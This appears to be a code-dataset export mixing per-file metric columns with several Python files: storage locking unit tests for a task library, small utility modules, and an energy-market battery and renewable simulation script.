| 23.9 | 48 | 0.740586 | 35 | 239 | 5.057143 | 0.428571 | 0.225989 | 0.316384 | 0.305085 | 0.271186 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.146444 | 239 | 9 | 49 | 26.555556 | 0.867647 | 0 | 0 | 0 | 0 | 0 | 0.041841 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.625 | 0 | 0.625 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
1209e5404f14ce7a79e611f2861564509550be74 | 36 | py | Python | api/resources/expression/datasets.py | armell/RNASEqTool | 88ee1011cd2597a04f5f7bfc811649ed17d40752 | [
"MIT"
] | 2 | 2019-03-26T16:32:59.000Z | 2019-11-19T09:46:14.000Z | api/resources/expression/datasets.py | armell/RNASEqTool | 88ee1011cd2597a04f5f7bfc811649ed17d40752 | [
"MIT"
] | 1 | 2021-12-13T20:22:47.000Z | 2021-12-13T20:22:47.000Z | api/resources/expression/datasets.py | armell/RNASEqTool | 88ee1011cd2597a04f5f7bfc811649ed17d40752 | [
"MIT"
] | null | null | null | from entities import entities as ent | 36 | 36 | 0.861111 | 6 | 36 | 5.166667 | 0.833333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.138889 | 36 | 1 | 36 | 36 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
1245d03c5a78386498c2a54426e8fd13f1423f12 | 7,502 | py | Python | tasker/tests/test_storage.py | adir-intsights/tasker | 7e7eb3b375a6f5317d0bcbbc40426baa676d51f5 | [
"Apache-2.0"
] | null | null | null | tasker/tests/test_storage.py | adir-intsights/tasker | 7e7eb3b375a6f5317d0bcbbc40426baa676d51f5 | [
"Apache-2.0"
] | null | null | null | tasker/tests/test_storage.py | adir-intsights/tasker | 7e7eb3b375a6f5317d0bcbbc40426baa676d51f5 | [
"Apache-2.0"
] | null | null | null | import unittest
import time
import threading
from .. import connector
from .. import storage
from .. import encoder
class StorageTestCase:
def test_lock_key(
self,
):
self.storage.release_lock_key(
name=self.test_key,
)
lock_key_value = self.storage.get_key(
name=self.test_lock_key,
)
self.assertEqual(
first=lock_key_value,
second={},
)
timer = threading.Timer(
interval=2.0,
function=self.storage.release_lock_key,
args=(
self.test_key,
),
)
timer.start()
acquired = self.storage.acquire_lock_key(
name=self.test_key,
)
self.assertTrue(
expr=acquired,
)
time_acquired = time.time()
lock_key_value = self.storage.get_key(
name=self.test_lock_key,
)
self.assertEqual(
first=lock_key_value,
second='locked',
)
acquired = self.storage.acquire_lock_key(
name=self.test_key,
)
self.assertTrue(
expr=acquired,
)
time_released = time.time()
lock_time = time_released - time_acquired
self.assertTrue(
expr=2.2 > lock_time > 1.9,
)
lock_key_value = self.storage.get_key(
name=self.test_lock_key,
)
self.assertEqual(
first=lock_key_value,
second='locked',
)
self.storage.release_lock_key(
name=self.test_key,
)
lock_key_value = self.storage.get_key(
name=self.test_lock_key,
)
self.assertEqual(
first=lock_key_value,
second={},
)
self.storage.acquire_lock_key(
name=self.test_key,
)
self.assertTrue(
expr=acquired,
)
timer = threading.Timer(
interval=2,
function=self.storage.release_lock_key,
args=(
self.test_key,
)
)
timer.start()
acquired = self.storage.acquire_lock_key(
name=self.test_key,
timeout=3,
)
self.assertTrue(
expr=acquired,
)
acquired = self.storage.acquire_lock_key(
name=self.test_key,
timeout=2,
)
self.assertFalse(
expr=acquired,
)
def test_functions(
self,
):
self.storage.release_lock_key(
name=self.test_key,
)
lock_key_value = self.storage.get_key(
name=self.test_lock_key,
)
self.assertEqual(
first=lock_key_value,
second={},
)
acquired = self.storage.acquire_lock_key(
name=self.test_key,
)
self.assertTrue(
expr=acquired,
)
lock_key_value = self.storage.get_key(
name=self.test_lock_key,
)
self.assertEqual(
first=lock_key_value,
second='locked',
)
self.storage.release_lock_key(
name=self.test_key,
)
lock_key_value = self.storage.get_key(
name=self.test_lock_key,
)
self.assertEqual(
first=lock_key_value,
second={},
)
class SingleMongoStorageTestCase(
StorageTestCase,
unittest.TestCase,
):
def setUp(
self,
):
self.mongo_connector = connector.mongo.Connector(
mongodb_uri='mongodb://localhost:27030/',
)
self.storage = storage.storage.Storage(
connector=self.mongo_connector,
encoder=encoder.encoder.Encoder(
compressor_name='dummy',
serializer_name='pickle',
),
)
self.test_key = 'test_key'
self.test_lock_key = '_storage_{key_name}_lock'.format(
key_name=self.test_key,
)
class SingleRedisStorageTestCase(
StorageTestCase,
unittest.TestCase,
):
def setUp(
self,
):
self.redis_connector = connector.redis.Connector(
host='127.0.0.1',
port=6379,
password='e082ebf6c7fff3997c4bb1cb64d6bdecd0351fa270402d98d35acceef07c6b97',
database=0,
)
self.storage = storage.storage.Storage(
connector=self.redis_connector,
encoder=encoder.encoder.Encoder(
compressor_name='dummy',
serializer_name='pickle',
),
)
self.test_key = 'test_key'
self.test_lock_key = '_storage_{key_name}_lock'.format(
key_name=self.test_key,
)
class RedisClusterSingleServerStorageTestCase(
StorageTestCase,
unittest.TestCase,
):
def setUp(
self,
):
self.redis_connector = connector.redis_cluster.Connector(
nodes=[
{
'host': '127.0.0.1',
'port': 6379,
'password': 'e082ebf6c7fff3997c4bb1cb64d6bdecd0351fa270402d98d35acceef07c6b97',
'database': 0,
},
]
)
self.storage = storage.storage.Storage(
connector=self.redis_connector,
encoder=encoder.encoder.Encoder(
compressor_name='dummy',
serializer_name='pickle',
),
)
self.test_key = 'test_key'
self.test_lock_key = '_storage_{key_name}_lock'.format(
key_name=self.test_key,
)
class RedisClusterMultipleServersStorageTestCase(
StorageTestCase,
unittest.TestCase,
):
def setUp(
self,
):
self.redis_connector = connector.redis_cluster.Connector(
nodes=[
{
'host': '127.0.0.1',
'port': 6379,
'password': 'e082ebf6c7fff3997c4bb1cb64d6bdecd0351fa270402d98d35acceef07c6b97',
'database': 0,
},
{
'host': '127.0.0.1',
'port': 6380,
'password': 'e082ebf6c7fff3997c4bb1cb64d6bdecd0351fa270402d98d35acceef07c6b97',
'database': 0,
},
]
)
self.storage = storage.storage.Storage(
connector=self.redis_connector,
encoder=encoder.encoder.Encoder(
compressor_name='dummy',
serializer_name='pickle',
),
)
self.test_key = 'test_key'
self.test_lock_key = '_storage_{key_name}_lock'.format(
key_name=self.test_key,
)
class TaskerServerStorageTestCase(
StorageTestCase,
unittest.TestCase,
):
def setUp(
self,
):
self.tasker_server_connector = connector.tasker.Connector(
host='127.0.0.1',
port=50001,
)
self.storage = storage.storage.Storage(
connector=self.tasker_server_connector,
encoder=encoder.encoder.Encoder(
compressor_name='dummy',
serializer_name='pickle',
),
)
self.test_key = 'test_key'
self.test_lock_key = '_storage_{key_name}_lock'.format(
key_name=self.test_key,
)
| 25.344595 | 99 | 0.522794 | 665 | 7,502 | 5.643609 | 0.108271 | 0.072742 | 0.064482 | 0.08793 | 0.843592 | 0.82867 | 0.82494 | 0.767386 | 0.767386 | 0.767386 | 0 | 0.043563 | 0.384964 | 7,502 | 295 | 100 | 25.430508 | 0.769831 | 0 | 0 | 0.65019 | 0 | 0 | 0.084244 | 0.053586 | 0 | 0 | 0 | 0 | 0.053232 | 1 | 0.026616 | false | 0.015209 | 0.022814 | 0 | 0.072243 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
124ac3cd15b44f8df8f3c9e9ebb2e5f46cc648ba | 87 | py | Python | qmldataset/noise_profiles/__init__.py | rajibchakravorty/QDataSet | 8eb21b8c7dad5654358021dd73b93ab90443f6d0 | [
"MIT"
] | null | null | null | qmldataset/noise_profiles/__init__.py | rajibchakravorty/QDataSet | 8eb21b8c7dad5654358021dd73b93ab90443f6d0 | [
"MIT"
] | null | null | null | qmldataset/noise_profiles/__init__.py | rajibchakravorty/QDataSet | 8eb21b8c7dad5654358021dd73b93ab90443f6d0 | [
"MIT"
] | null | null | null | """Module to define noise profiles
"""
from .create_noise import create_noise_profile
| 17.4 | 46 | 0.793103 | 12 | 87 | 5.5 | 0.75 | 0.333333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.126437 | 87 | 4 | 47 | 21.75 | 0.868421 | 0.356322 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
124cccf419d717eaab8e96f2e5a6f446359a8d82 | 694 | py | Python | imapmover/util.py | nickovs/imapmover | db999ac66829161ccffffe668e2a50b7e811b502 | [
"Apache-2.0"
] | null | null | null | imapmover/util.py | nickovs/imapmover | db999ac66829161ccffffe668e2a50b7e811b502 | [
"Apache-2.0"
] | null | null | null | imapmover/util.py | nickovs/imapmover | db999ac66829161ccffffe668e2a50b7e811b502 | [
"Apache-2.0"
] | null | null | null | # Copyright 2021 Nicko van Someren
#
# Licensed under the Apache License, Version 2.0 (the "License")
# See the LICENSE.txt file for details
# SPDX-License-Identifier: Apache-2.0
"""Utility functions and classes"""
class DummyProgress:
"""A dummy stub when progress indication is not needed"""
def __init__(self, *args, **kwargs):
pass
def __enter__(self):
return self
def __exit__(self, *args, **kwargs):
return False
def set_description(self, *args, **kwargs):
pass
def reset(self, *args, **kwargs):
pass
def update(self, *args, **kwargs):
pass
def set_postfix_str(self, *args, **kwargs):
pass
| 21.030303 | 64 | 0.631124 | 88 | 694 | 4.806818 | 0.579545 | 0.113475 | 0.198582 | 0.212766 | 0.198582 | 0 | 0 | 0 | 0 | 0 | 0 | 0.015414 | 0.252161 | 694 | 32 | 65 | 21.6875 | 0.799615 | 0.361671 | 0 | 0.333333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.466667 | false | 0.333333 | 0 | 0.133333 | 0.666667 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | 0 | 6 |
12723950b39084540d92ed7466eda23227e72fe6 | 51,529 | py | Python | main.py | Jipje/local_smart_grid_simulation | ca11bcf349c51bd24e0a8dffd21ca82e35c8255a | [
"MIT"
] | null | null | null | main.py | Jipje/local_smart_grid_simulation | ca11bcf349c51bd24e0a8dffd21ca82e35c8255a | [
"MIT"
] | null | null | null | main.py | Jipje/local_smart_grid_simulation | ca11bcf349c51bd24e0a8dffd21ca82e35c8255a | [
"MIT"
] | null | null | null | from csv import reader
import os
import random
import datetime as dt
import dateutil.tz
import pandas as pd
from pandas import NaT
from environment.NetworkEnvironment import NetworkEnvironment
from environment.TotalNetworkCapacityTracker import TotalNetworkCapacityTracker
from helper_objects.congestion_helper.month_congestion_size_and_timer import get_month_congestion_timings
from helper_objects.strategies.CsvStrategy import CsvStrategy
from helper_objects.strategies.DischargeUntilStrategy import DischargeUntilStrategy
from helper_objects.strategies.PointBasedStrategy import PointBasedStrategy
from helper_objects.strategies.RandomStrategyGenerator import generate_random_discharge_relative_strategy
from helper_objects.strategies.giga_baseline_strategies import get_month_strategy
from network_objects.Battery import Battery
from network_objects.control_strategies.ModesOfOperationController import ModesOfOperationController
from network_objects.control_strategies.MonthOfModesOfOperationController import MonthOfModesOfOperationController
from network_objects.control_strategies.SolveCongestionAndLimitedChargeControlTower import \
SolveCongestionAndLimitedChargeControlTower
from network_objects.control_strategies.StrategyControlTower import StrategyControlTower
from environment.ImbalanceEnvironment import ImbalanceEnvironment
from network_objects.control_strategies.StrategyWithLimitedChargeCapacityControlTower import \
StrategyWithLimitedChargeCapacityControlTower
from network_objects.control_strategies.SolveCongestionControlTower import \
SolveCongestionControlTower
from network_objects.RenewableEnergyGenerator import RenewableEnergyGenerator
base_scenario = 'data{0}environments{0}lelystad_1_2021.csv'.format(os.path.sep)
utc = dateutil.tz.tzutc()
def run_random_thirty_days(scenario=base_scenario, verbose_lvl=2, simulation_environment=None):
start_day = random.randint(0, 333)
starting_timestep = start_day * 24 * 60
number_of_steps = 1 * 24 * 60
print('Random thirty days - Starting timestep: {} - Number of Steps: {}'.format(starting_timestep, number_of_steps))
res = run_simulation(starting_timestep, number_of_steps, scenario=scenario, verbose_lvl=verbose_lvl, simulation_environment=simulation_environment)
print('Just ran random thirty days.- Starting timestep: {} - Number of Steps: {}'.format(starting_timestep, number_of_steps))
return res
def run_single_month(month, scenario=base_scenario, verbose_lvl=2, simulation_environment=None):
starting_timesteps = [0, 60, 44700, 85020, 129600, 172800, 217440, 260475, 305115, 349755, 392955, 437595, 480795, 525376]
assert 13 > month > 0
dt_month = dt.datetime(2021, month, 1)
month_str = dt_month.strftime('%B %Y')
starting_timestep = starting_timesteps[month]
number_of_steps = starting_timesteps[month + 1] - starting_timestep
print('Run {} - Starting timestep: {} - Number of Steps: {}'.format(month_str, starting_timestep, number_of_steps))
res = run_simulation(starting_timestep, number_of_steps, scenario=scenario, verbose_lvl=verbose_lvl,
simulation_environment=simulation_environment)
print('Just ran {} - Starting timestep: {} - Number of Steps: {}'.format(month_str, starting_timestep, number_of_steps))
return res
def run_full_scenario(scenario=base_scenario, verbose_lvl=1, simulation_environment=None):
starting_timestep = 0
with open(scenario) as file:
number_of_steps = len(file.readlines()) + 1
print('Running full scenario {}'.format(scenario))
res = run_simulation(starting_timestep, number_of_steps, scenario=scenario, verbose_lvl=verbose_lvl, simulation_environment=simulation_environment)
print('Just ran full scenario {}\n'.format(scenario))
return res
def run_simulation(starting_time_step=0, number_of_steps=100, scenario=base_scenario, verbose_lvl=3, simulation_environment=None):
if simulation_environment is None:
baseline_rhino_simulation(verbose_lvl=verbose_lvl)
# open file in read mode
with open(scenario, 'r') as read_obj:
csv_reader = reader(read_obj)
steps_taken = 0
old_day = 0
old_week = 0
old_month = 0
# Open the scenario
for environment_data in csv_reader:
if starting_time_step >= 0: # Skip lines until we reach the starting step.
starting_time_step = starting_time_step - 1
else:
# Figure out date of the data
time_step_dt = dt.datetime.strptime(environment_data[0], '%Y-%m-%d %H:%M:%S%z')
time_step_dt = time_step_dt.astimezone(tz=dt.timezone.utc)
environment_data[0] = time_step_dt
time_step_string = time_step_dt.strftime('%H:%M %d-%m-%Y UTC')
# Announce start of simulation
if steps_taken == 0 and verbose_lvl >= 0:
print('Starting simulation from PTU {}'.format(time_step_string))
# Give an update of how it is going in the mean_time
curr_month = time_step_dt.month
curr_week = time_step_dt.isocalendar()[1]
curr_day = time_step_dt.day
if curr_day != old_day and verbose_lvl > 2 or \
curr_week != old_week and verbose_lvl > 1 or \
curr_month != old_month and verbose_lvl > 0:
msg = time_step_string[6:-4] + '\n\t' + simulation_environment.done_in_mean_time()
print(msg)
old_day = curr_day
old_week = curr_week
old_month = curr_month
# End simulation here if number of steps have been taken.
if steps_taken >= number_of_steps: # If we reach our maximum amount of steps. Stop the simulation
break
else:
# Otherwise, ensure data of enviroment steps is correct
try:
if environment_data[1] == 'nan':
raise ValueError
if scenario.__contains__('windnet'):
environment_data[2] = float(environment_data[2])
environment_data[1] = float(environment_data[1])
environment_data[3] = float(environment_data[3])
environment_data[5] = float(environment_data[5])
environment_data[7] = float(environment_data[7])
elif scenario.__contains__('lelystad'):
environment_data[1] = float(environment_data[1])
environment_data[2] = float(environment_data[2])
environment_data[3] = float(environment_data[3])
environment_data[4] = float(environment_data[4])
environment_data[5] = None if environment_data[5] == '' else float(environment_data[5])
environment_data[6] = None if environment_data[6] == '' else float(environment_data[6])
environment_data[7] = None if environment_data[7] == '' else float(environment_data[7])
environment_data[8] = None if environment_data[8] == '' else float(environment_data[8])
environment_data[9] = None if environment_data[9] == '' else float(environment_data[9])
if verbose_lvl > 3:
print(f'Running environment step {time_step_string}')
except ValueError:
if verbose_lvl > 2:
print("Skipping timestep {} as data is missing".format(time_step_string))
continue
# The environment should take a step here.
simulation_environment.take_step(environment_data)
# Update steps taken
steps_taken = steps_taken + 1
# Print information at the end of the simulation.
if verbose_lvl >= 0:
msg = time_step_string[6:-4] + '\n\t' + simulation_environment.done_in_mean_time()
print(msg)
print('----------------------------------------')
print('End of simulation, final PTU: {}'.format(time_step_string))
print(simulation_environment.end_of_environment_message(environment_additions=[]))
return simulation_environment.end_of_environment_metrics(current_metrics={})
def run_simulation_from_dict_of_df(starting_time_step=0, number_of_steps=100, scenario=base_scenario, verbose_lvl=3,
simulation_environment=None, dict_of_df=None):
if simulation_environment is None or dict_of_df is None:
baseline_rhino_simulation(verbose_lvl=verbose_lvl)
steps_taken = 0
old_day = 0
old_week = 0
old_month = 0
# Open the scenario
for environment_dict in dict_of_df:
if starting_time_step >= 0: # Skip lines until we reach the starting step.
starting_time_step = starting_time_step - 1
else:
environment_data = []
# Figure out date of the data
time_step_dt = dt.datetime.strptime(environment_dict['time_utc'], '%Y-%m-%d %H:%M:%S%z')
time_step_dt = time_step_dt.astimezone(tz=dt.timezone.utc)
environment_data.append(time_step_dt)
time_step_string = time_step_dt.strftime('%H:%M %d-%m-%Y UTC')
# Announce start of simulation
if steps_taken == 0 and verbose_lvl >= 0:
print('Starting simulation from PTU {}'.format(time_step_string))
# Give an update of how it is going in the mean_time
curr_month = time_step_dt.month
curr_week = time_step_dt.isocalendar()[1]
curr_day = time_step_dt.day
if curr_day != old_day and verbose_lvl > 2 or \
curr_week != old_week and verbose_lvl > 1 or \
curr_month != old_month and verbose_lvl > 0:
msg = time_step_string[6:-4] + '\n\t' + simulation_environment.done_in_mean_time()
print(msg)
old_day = curr_day
old_week = curr_week
old_month = curr_month
# End simulation here if number of steps have been taken.
if steps_taken >= number_of_steps: # If we reach our maximum amount of steps. Stop the simulation
break
else:
# Otherwise, ensure data of enviroment steps is correct
try:
if environment_dict['tennet_balansdelta.mean_max_price'] == 'nan':
raise ValueError
if scenario.__contains__('windnet'):
environment_data.append(float(environment_dict['tennet_balansdelta.mean_max_price']))
environment_data.append(float(environment_dict['tennet_balansdelta.mean_mid_price']))
environment_dict[3] = float(environment_dict[3])
environment_dict[5] = float(environment_dict[5])
environment_dict[7] = float(environment_dict[7])
elif scenario.__contains__('lelystad'):
environment_data.append(float(environment_dict['tennet_balansdelta.mean_max_price']))
environment_data.append(float(environment_dict['tennet_balansdelta.mean_mid_price']))
environment_data.append(float(environment_dict['tennet_balansdelta.mean_min_price']))
environment_data.append(float(environment_dict['power']))
environment_data.append(None if environment_dict['irradiance'] == '' else float(environment_dict['irradiance']))
environment_data.append(None if environment_dict['expected_power'] == '' else float(environment_dict['expected_power']))
environment_data.append(None if environment_dict['lower_range'] == '' else float(environment_dict['lower_range']))
environment_data.append(None if environment_dict['upper_range'] == '' else float(environment_dict['upper_range']))
environment_data.append(None if environment_dict['losses'] == '' else float(environment_dict['losses']))
if verbose_lvl > 3:
print(f'Running environment step {time_step_string}')
except ValueError:
if verbose_lvl > 2:
print("Skipping timestep {} as data is missing".format(time_step_string))
continue
# The environment should take a step here.
simulation_environment.take_step(environment_data)
# Update steps taken
steps_taken = steps_taken + 1
# Print information at the end of the simulation.
if verbose_lvl >= 0:
print('----------------------------------------')
print('End of simulation, final PTU: {}'.format(time_step_string))
print(simulation_environment.end_of_environment_message(environment_additions=[]))
return simulation_environment.end_of_environment_metrics(current_metrics={})
def network_capacity_windnet_simulation(network_capacity=27000, verbose_lvl=1):
# Setup environment
imbalance_environment = NetworkEnvironment(verbose_lvl=verbose_lvl)
ImbalanceEnvironment(imbalance_environment, mid_price_index=2, max_price_index=1, min_price_index=3)
TotalNetworkCapacityTracker(imbalance_environment, network_capacity)
windnet = RenewableEnergyGenerator('Neushoorntocht wind farm', 23000, verbose_lvl=verbose_lvl)
imbalance_environment.add_object(windnet, [1, 3, 5])
run_full_scenario(scenario='data/tennet_and_windnet/tennet_balans_delta_and_pandas_windnet.csv', simulation_environment=imbalance_environment, verbose_lvl=verbose_lvl)
def baseline_rhino_simulation(verbose_lvl=1):
# Baseline Rhino simulation
imbalance_environment = NetworkEnvironment(verbose_lvl=verbose_lvl)
ImbalanceEnvironment(imbalance_environment, mid_price_index=2, max_price_index=1, min_price_index=3)
csv_strategy = CsvStrategy('Rhino strategy 1', strategy_csv='data/strategies/cleaner_simplified_passive_imbalance_1.csv')
rhino = Battery('Rhino', 7500, 12000, battery_efficiency=0.9, starting_soc_kwh=3750, verbose_lvl=verbose_lvl)
simple_strategy_controller = StrategyControlTower(name="Rhino Battery Controller", network_object=rhino, strategy=csv_strategy, verbose_lvl=verbose_lvl)
imbalance_environment.add_object(simple_strategy_controller, [1, 3])
run_full_scenario(scenario='data/environments/lelystad_1_2021.csv',
simulation_environment=imbalance_environment, verbose_lvl=verbose_lvl)
def rhino_windnet_limited_charging(verbose_lvl=1):
# Rhino with limited charging simulation
imbalance_environment = NetworkEnvironment(verbose_lvl=verbose_lvl)
ImbalanceEnvironment(imbalance_environment, mid_price_index=2, max_price_index=1, min_price_index=3)
csv_strategy = CsvStrategy('Rhino strategy 1', strategy_csv='data/strategies/cleaner_simplified_passive_imbalance_1.csv')
rhino = Battery('Rhino', 7500, 12000, battery_efficiency=0.9, starting_soc_kwh=3750, verbose_lvl=verbose_lvl)
strategy_limited_charge_controller = StrategyWithLimitedChargeCapacityControlTower(name="Rhino Battery Controller", network_object=rhino, strategy=csv_strategy, verbose_lvl=verbose_lvl)
imbalance_environment.add_object(strategy_limited_charge_controller, [1, 3, 5])
run_full_scenario(scenario='data/tennet_and_windnet/tennet_balans_delta_and_pandas_windnet.csv',
simulation_environment=imbalance_environment, verbose_lvl=verbose_lvl)
def wombat_solarvation_limited_charging(verbose_lvl=1, base_money_strat=True):
# Wombat with limited charging simulation
imbalance_environment = NetworkEnvironment(verbose_lvl=verbose_lvl)
ImbalanceEnvironment(imbalance_environment, mid_price_index=2, max_price_index=1, min_price_index=3)
TotalNetworkCapacityTracker(imbalance_environment, 14000)
solarvation = RenewableEnergyGenerator('Solarvation solar farm', 19000, verbose_lvl=verbose_lvl)
imbalance_environment.add_object(solarvation, [1, 3, 4])
wombat = Battery('Wombat', 30000, 14000, battery_efficiency=0.9, starting_soc_kwh=1600, verbose_lvl=verbose_lvl)
if base_money_strat:
csv_strategy = CsvStrategy('Rhino strategy 1',
strategy_csv='data/strategies/cleaner_simplified_passive_imbalance_1.csv')
main_controller = StrategyWithLimitedChargeCapacityControlTower(
name="Wombat Battery Controller", network_object=wombat, strategy=csv_strategy, verbose_lvl=verbose_lvl,
transportation_kw=2000)
imbalance_environment.add_object(main_controller, [1, 3, 4])
else:
main_controller = MonthOfModesOfOperationController(name='Wombat main controller',
network_object=wombat, verbose_lvl=verbose_lvl)
for month_num in range(1, 13):
money_earn_strat_month = get_month_strategy(month_num)
limited_charge_controller = StrategyWithLimitedChargeCapacityControlTower(
name=f"Wombat Controller Month {month_num}", network_object=wombat, strategy=money_earn_strat_month,
verbose_lvl=verbose_lvl, transportation_kw=2000)
main_controller.add_controller(limited_charge_controller)
imbalance_environment.add_object(main_controller, [1, 3, 4, 0])
return run_full_scenario(simulation_environment=imbalance_environment, verbose_lvl=verbose_lvl)
def solarvation_dumb_discharging(verbose_lvl=1, congestion_kw=14000):
imbalance_environment = NetworkEnvironment(verbose_lvl=verbose_lvl)
ImbalanceEnvironment(imbalance_environment, mid_price_index=2, max_price_index=1, min_price_index=3)
TotalNetworkCapacityTracker(imbalance_environment, congestion_kw)
solarvation = RenewableEnergyGenerator('Solarvation solar farm', 19000, verbose_lvl=verbose_lvl)
imbalance_environment.add_object(solarvation, [1, 3, 4])
return run_full_scenario(simulation_environment=imbalance_environment, verbose_lvl=verbose_lvl)
def baseline_windnet(verbose_lvl=1):
# Baseline Windnet simulation
imbalance_environment = NetworkEnvironment(verbose_lvl=verbose_lvl)
ImbalanceEnvironment(imbalance_environment, mid_price_index=2, max_price_index=1, min_price_index=3)
windnet = RenewableEnergyGenerator('Windnet wind farm', 23000, verbose_lvl=verbose_lvl)
imbalance_environment.add_object(windnet, [1, 3, 5])
run_full_scenario(scenario='data/tennet_and_windnet/tennet_balans_delta_and_pandas_windnet.csv',
simulation_environment=imbalance_environment, verbose_lvl=verbose_lvl)
def baseline_solarvation(verbose_lvl=1):
imbalance_environment = NetworkEnvironment(verbose_lvl=verbose_lvl)
ImbalanceEnvironment(imbalance_environment, mid_price_index=2, max_price_index=1, min_price_index=3)
solarvation = RenewableEnergyGenerator('Solarvation solar farm', 19000, verbose_lvl=verbose_lvl)
imbalance_environment.add_object(solarvation, [1, 3, 4])
run_full_scenario(scenario='data/environments/lelystad_1_2021.csv',
simulation_environment=imbalance_environment, verbose_lvl=verbose_lvl)
def windnet_with_ppa(verbose_lvl=1):
# Windnet with a PPA simulation
imbalance_environment = NetworkEnvironment(verbose_lvl=verbose_lvl)
ImbalanceEnvironment(imbalance_environment, mid_price_index=2, max_price_index=1, min_price_index=3)
windnet = RenewableEnergyGenerator('Windnet wind farm', 23000, verbose_lvl=verbose_lvl, ppa=40)
imbalance_environment.add_object(windnet, [1, 3, 5])
run_full_scenario(scenario='data/tennet_and_windnet/tennet_balans_delta_and_pandas_windnet.csv',
simulation_environment=imbalance_environment, verbose_lvl=1)
def full_rhino_site_capacity(network_capacity=27000, verbose_lvl=1):
# Rhino and Neushoorntocht with networkcapacity
imbalance_environment = NetworkEnvironment(verbose_lvl=verbose_lvl)
ImbalanceEnvironment(imbalance_environment, mid_price_index=2, max_price_index=1, min_price_index=3)
TotalNetworkCapacityTracker(imbalance_environment, network_capacity)
csv_strategy = CsvStrategy('Rhino strategy 1', strategy_csv='data/strategies/cleaner_simplified_passive_imbalance_1.csv')
rhino = Battery('Rhino', 7500, 12000, battery_efficiency=0.9, starting_soc_kwh=3750, verbose_lvl=verbose_lvl)
simple_strategy_controller = StrategyWithLimitedChargeCapacityControlTower(name="Rhino Battery Controller", network_object=rhino,
strategy=csv_strategy, verbose_lvl=verbose_lvl)
imbalance_environment.add_object(simple_strategy_controller, [1, 3, 5])
windnet = RenewableEnergyGenerator('Neushoorntocht wind farm', 23000, verbose_lvl=verbose_lvl)
imbalance_environment.add_object(windnet, [1, 3, 5])
run_full_scenario(scenario='data/tennet_and_windnet/tennet_balans_delta_and_pandas_windnet.csv',
simulation_environment=imbalance_environment, verbose_lvl=verbose_lvl)
def random_rhino_strategy_simulation(verbose_lvl=1, seed=None):
# Initialise environment
imbalance_environment = NetworkEnvironment(verbose_lvl=verbose_lvl)
ImbalanceEnvironment(imbalance_environment, mid_price_index=2, max_price_index=1, min_price_index=3)
# Initialise random strategy
random_point_based_strategy = generate_random_discharge_relative_strategy(seed=seed)
random_step_battery = Battery('Random Rhino', 7500, 12000, battery_efficiency=0.9, starting_soc_kwh=3750, verbose_lvl=verbose_lvl)
simple_strategy_controller = StrategyControlTower(name="Random strategy Battery Controller", network_object=random_step_battery,
strategy=random_point_based_strategy, verbose_lvl=verbose_lvl)
imbalance_environment.add_object(simple_strategy_controller, [1, 3])
csv_strategy = CsvStrategy('Rhino strategy 1', strategy_csv='data/strategies/cleaner_simplified_passive_imbalance_1.csv')
rhino = Battery('Rhino', 7500, 12000, battery_efficiency=0.9, starting_soc_kwh=3750, verbose_lvl=verbose_lvl)
simple_strategy_controller = StrategyControlTower(name="Rhino Battery Controller", network_object=rhino, strategy=csv_strategy, verbose_lvl=verbose_lvl)
imbalance_environment.add_object(simple_strategy_controller, [1, 3])
run_full_scenario(scenario='data/environments/lelystad_1_2021.csv',
simulation_environment=imbalance_environment, verbose_lvl=1)
def super_naive_baseline(verbose_lvl=1):
network_capacity = 14000
congestion_safety_margin = 0.99
imbalance_environment = NetworkEnvironment(verbose_lvl=verbose_lvl)
ImbalanceEnvironment(imbalance_environment, mid_price_index=2, max_price_index=1, min_price_index=3)
TotalNetworkCapacityTracker(imbalance_environment, network_capacity)
solarvation = RenewableEnergyGenerator('Solarvation solar farm', 19000, verbose_lvl=verbose_lvl)
battery = Battery('Wombat', 30000, 14000, battery_efficiency=0.9, starting_soc_kwh=15000, verbose_lvl=verbose_lvl)
csv_strategy = CsvStrategy('Discharge above 60', strategy_csv='data/strategies/greedy_discharge_60.csv')
congestion_controller = SolveCongestionControlTower(name="Solarvation Congestion Controller", network_object=battery,
congestion_kw=network_capacity, congestion_safety_margin=congestion_safety_margin,
strategy=csv_strategy, verbose_lvl=verbose_lvl)
imbalance_environment.add_object(solarvation, [1, 3, 4])
imbalance_environment.add_object(congestion_controller, [1, 3, 4])
